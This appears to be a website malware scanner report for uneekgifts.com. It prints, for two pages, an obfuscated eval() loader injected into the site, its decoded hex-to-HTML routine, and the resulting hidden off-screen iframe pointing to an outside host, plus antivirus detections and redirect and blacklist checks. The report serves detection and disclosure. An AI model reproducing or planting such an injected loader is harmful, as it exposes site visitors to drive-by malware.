New scan:

Malware Scanner report for uneekgifts.com

Malicious/Suspicious/Total urls checked
2/0/2
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://uneekgifts.com/
200 OK
Content-Length: 1019
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o k(3){1 7=\'s\';1 5=e g();c(1 i=0;i<q;i++){5[7.b(i>>4)+7.b(i&l)]=m.n(i)}d(!3.r(/^[a-t-9]*$/i))h y;d(3.f%2)3=\'0\'+3;1 8=3.f;1 6=e g();1 j=0;c(1 i=0;i<8;i+=2){6[j++]=5[3.v(i,2)]}h 6.x(\'\')}w.p(k(\'u\
... 17 bytes are skipped ...
||data||b16_map|result|b16_digits|ll|||charAt|for|if|new|length|Array|return|||hDcd|15|String|fromCharCode|function|write|256|match|0123456789abcdef|f0|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393770783b20746f703a202d3239393570783b223e3c696672616d652077696474683d223222206865696768743d223422207372633d22687474703a2f2f616866747974647a726d2e6d796674702e6f72672f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e|substr|document|join|false'.split('|'),0,{}))

Decoded script:


function hDcd(data){var b16_digits='0123456789abcdef';var b16_map=new Array();for(var i=0;i<256;i++){b16_map[b16_digits.charAt(i>>4)+b16_digits.charAt(i&15)]=String.fromCharCode(i)}if(!data.match(/^[a-f0-9]*$/i))return false;if(data.length%2)data='0'+data;var ll=data.length;var result=new Array();var j=0;for(var i=0;i<ll;i+=2){result[j++]=b16_map[data.substr(i,2)]}return result.join('')}document.write(hDcd('3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c65
... 661 bytes are skipped ...
te(hDcd('3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393770783b20746f703a202d3239393570783b223e3c696672616d652077696474683d223222206865696768743d223422207372633d22687474703a2f2f616866747974647a726d2e6d796674702e6f72672f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e'));
<div style="position: absolute; left: -1997px; top: -2995px;"><iframe width="2" height="4" src="http://ahftytdzrm.myftp.org/i.php?go=1"></iframe></div>

Antivirus reports:

AntiVir
HTML/Enchor.A
Avast
JS:Iframe-DV [Trj]
nProtect
JS:Trojan.Script.CO
Emsisoft
JS:Trojan.Script.CO (B)
Microsoft
Exploit:HTML/IframeRef.BL
Jiangmin
Trojan/Script.Gen
F-Secure
JS:Trojan.Script.CO
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
Norman
Kryptik.BQS
GData
JS:Trojan.Script.CO
Commtouch
IFrame.gen
BitDefender
JS:Trojan.Script.CO

http://uneekgifts.com/test404page.js
200 OK
Content-Length: 1019
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o k(3){1 7=\'s\';1 5=e g();c(1 i=0;i<q;i++){5[7.b(i>>4)+7.b(i&l)]=m.n(i)}d(!3.r(/^[a-t-9]*$/i))h y;d(3.f%2)3=\'0\'+3;1 8=3.f;1 6=e g();1 j=0;c(1 i=0;i<8;i+=2){6[j++]=5[3.v(i,2)]}h 6.x(\'\')}w.p(k(\'u\
... 17 bytes are skipped ...
||data||b16_map|result|b16_digits|ll|||charAt|for|if|new|length|Array|return|||hDcd|15|String|fromCharCode|function|write|256|match|0123456789abcdef|f0|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393770783b20746f703a202d3239393570783b223e3c696672616d652077696474683d223222206865696768743d223422207372633d22687474703a2f2f616866747974647a726d2e6d796674702e6f72672f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e|substr|document|join|false'.split('|'),0,{}))

Decoded script:


function hDcd(data){var b16_digits='0123456789abcdef';var b16_map=new Array();for(var i=0;i<256;i++){b16_map[b16_digits.charAt(i>>4)+b16_digits.charAt(i&15)]=String.fromCharCode(i)}if(!data.match(/^[a-f0-9]*$/i))return false;if(data.length%2)data='0'+data;var ll=data.length;var result=new Array();var j=0;for(var i=0;i<ll;i+=2){result[j++]=b16_map[data.substr(i,2)]}return result.join('')}document.write(hDcd('3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c65
... 661 bytes are skipped ...
te(hDcd('3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393770783b20746f703a202d3239393570783b223e3c696672616d652077696474683d223222206865696768743d223422207372633d22687474703a2f2f616866747974647a726d2e6d796674702e6f72672f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e'));
<div style="position: absolute; left: -1997px; top: -2995px;"><iframe width="2" height="4" src="http://ahftytdzrm.myftp.org/i.php?go=1"></iframe></div>

Antivirus reports:

AntiVir
HTML/Enchor.A
Avast
JS:Iframe-DV [Trj]
nProtect
JS:Trojan.Script.CO
Emsisoft
JS:Trojan.Script.CO (B)
Microsoft
Exploit:HTML/IframeRef.BL
Jiangmin
Trojan/Script.Gen
F-Secure
JS:Trojan.Script.CO
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
Norman
Kryptik.BQS
GData
JS:Trojan.Script.CO
Commtouch
IFrame.gen
BitDefender
JS:Trojan.Script.CO


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: uneekgifts.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 17:43:42 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: uneekgifts.com
Referer: http://www.google.com/search?q=uneekgifts.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=uneekgifts.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://uneekgifts.com/

Result: uneekgifts.com is not infected or malware details are not published yet.